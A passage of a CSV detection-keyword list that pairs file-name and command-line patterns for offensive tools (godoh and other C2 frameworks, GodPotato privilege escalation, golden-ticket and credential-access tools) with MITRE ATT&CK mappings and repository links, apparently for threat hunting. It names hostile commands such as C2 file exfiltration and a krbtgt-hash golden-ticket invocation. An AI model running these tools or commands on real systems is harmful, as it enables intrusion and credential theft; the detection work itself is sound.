Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*gobustertftp*",".{0,1000}gobustertftp.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*gocrack@password.crackers.local*",".{0,1000}gocrack\@password\.crackers\.local.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1109","239","2024-03-13T21:35:11Z","2017-10-23T14:43:59Z" "*gocrack_v*_darwin_x64_hashcat_v3_6_0.zip*",".{0,1000}gocrack_v.{0,1000}_darwin_x64_hashcat_v3_6_0\.zip.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","9","10","1109","239","2024-03-13T21:35:11Z","2017-10-23T14:43:59Z" "*gocrack_v*_linux_x64_hashcat_v3_6_0.zip*",".{0,1000}gocrack_v.{0,1000}_linux_x64_hashcat_v3_6_0\.zip.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","9","10","1109","239","2024-03-13T21:35:11Z","2017-10-23T14:43:59Z" "*GodFault.exe*",".{0,1000}GodFault\.exe.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - 
T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*GodFault\GodFault*",".{0,1000}GodFault\\GodFault.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*godoh -*",".{0,1000}godoh\s\-.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*godoh agent*",".{0,1000}godoh\sagent.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*godoh c2*",".{0,1000}godoh\sc2.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. 
Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*godoh --domain*",".{0,1000}godoh\s\-\-domain.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*godoh help*",".{0,1000}godoh\shelp.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*godoh receive*",".{0,1000}godoh\sreceive.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*godoh send*",".{0,1000}godoh\ssend.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*godoh test --*",".{0,1000}godoh\stest\s\-\-.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*godoh test*",".{0,1000}godoh\stest.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*godoh* --agent-name *--poll-time*",".{0,1000}godoh.{0,1000}\s\-\-agent\-name\s.{0,1000}\-\-poll\-time.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*godoh* --domain * c2*",".{0,1000}godoh.{0,1000}\s\-\-domain\s.{0,1000}\sc2.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*godoh* --domain * receive*",".{0,1000}godoh.{0,1000}\s\-\-domain\s.{0,1000}\sreceive.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*godoh* --domain *send --file *",".{0,1000}godoh.{0,1000}\s\-\-domain\s.{0,1000}send\s\-\-file\s.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*godoh-darwin64*",".{0,1000}godoh\-darwin64.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*godoh-darwin64*",".{0,1000}godoh\-darwin64.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*godoh-linux64*",".{0,1000}godoh\-linux64.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*godoh-linux64*",".{0,1000}godoh\-linux64.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*godoh-windows32.*",".{0,1000}godoh\-windows32\..{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*godoh-windows32.exe*",".{0,1000}godoh\-windows32\.exe.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*godoh-windows64.*",".{0,1000}godoh\-windows64\..{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*godoh-windows64.exe*",".{0,1000}godoh\-windows64\.exe.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*go-donut/*.exe*",".{0,1000}go\-donut\/.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*go-donut/*.go*",".{0,1000}go\-donut\/.{0,1000}\.go.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*GodPotato -*",".{0,1000}GodPotato\s\-.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. 
It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1592","204","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z" "*godpotato.cna*",".{0,1000}godpotato\.cna.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/weaselsec/GodPotato-Aggressor-Script","1","0","N/A","9","1","81","8","2024-01-02T00:22:03Z","2024-01-02T00:02:54Z" "*GodPotato.cs*",".{0,1000}GodPotato\.cs.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","1592","204","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z" "*godpotato.exe*",".{0,1000}godpotato\.exe.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. 
It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1592","204","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z" "*GodPotato.git*",".{0,1000}GodPotato\.git.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1592","204","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z" "*GodPotato-Aggressor-Script*",".{0,1000}GodPotato\-Aggressor\-Script.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. 
It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/weaselsec/GodPotato-Aggressor-Script","1","1","N/A","9","1","81","8","2024-01-02T00:22:03Z","2024-01-02T00:02:54Z" "*GodPotatoContext.cs*",".{0,1000}GodPotatoContext\.cs.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","1592","204","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z" "*GodPotato-master.zip*",".{0,1000}GodPotato\-master\.zip.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. 
It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1592","204","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z" "*GodPotato-NET*.exe*",".{0,1000}GodPotato\-NET.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1592","204","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z" "*GodPotato-NET2.exe*",".{0,1000}GodPotato\-NET2\.exe.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. 
It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1592","204","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z" "*GodPotato-NET35.exe*",".{0,1000}GodPotato\-NET35\.exe.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1592","204","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z" "*GodPotato-NET4.exe*",".{0,1000}GodPotato\-NET4\.exe.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. 
It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1592","204","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z" "*GodPotato-NET4.exe*",".{0,1000}GodPotato\-NET4\.exe.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/weaselsec/GodPotato-Aggressor-Script","1","1","N/A","10","1","81","8","2024-01-02T00:22:03Z","2024-01-02T00:02:54Z" "*GodPotatoUnmarshalTrigger.cs*",".{0,1000}GodPotatoUnmarshalTrigger\.cs.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. 
It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1592","204","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z" "*go-external-c2*",".{0,1000}go\-external\-c2.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*GoFetchAD/GoFetch*",".{0,1000}GoFetchAD\/GoFetch.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","1","N/A","10","7","620","139","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" "*GoFetch-master*",".{0,1000}GoFetch\-master.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","1","N/A","10","7","620","139","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" "*gohaleygoandhackawaythegibson*",".{0,1000}gohaleygoandhackawaythegibson.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - 
T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*golang_c2-master*",".{0,1000}golang_c2\-master.{0,1000}","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","1","N/A","10","10","6","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z" "*golden_ticket.py*",".{0,1000}golden_ticket\.py.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*golden_ticket.rb*",".{0,1000}golden_ticket\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*goldencopy * --password * --stealth --krbtgt 060ee2d06c5648e60a9ed916c9221ad19d90e5fb7b1cccf9d51f540fe991ada1 *",".{0,1000}goldencopy\s.{0,1000}\s\-\-password\s.{0,1000}\s\-\-stealth\s\-\-krbtgt\s060ee2d06c5648e60a9ed916c9221ad19d90e5fb7b1cccf9d51f540fe991ada1\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*GoldenGMSA.exe*",".{0,1000}GoldenGMSA\.exe.{0,1000}","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","1","N/A","7","2","123","21","2024-04-11T07:51:57Z","2022-02-03T10:32:05Z" "*GoldenGMSA-main*",".{0,1000}GoldenGMSA\-main.{0,1000}","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","1","N/A","7","2","123","21","2024-04-11T07:51:57Z","2022-02-03T10:32:05Z" "*goldenPac.py*",".{0,1000}goldenPac\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with 
network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*goMatrixC2.go*",".{0,1000}goMatrixC2\.go.{0,1000}","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*goMatrixC2-main*",".{0,1000}goMatrixC2\-main.{0,1000}","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging 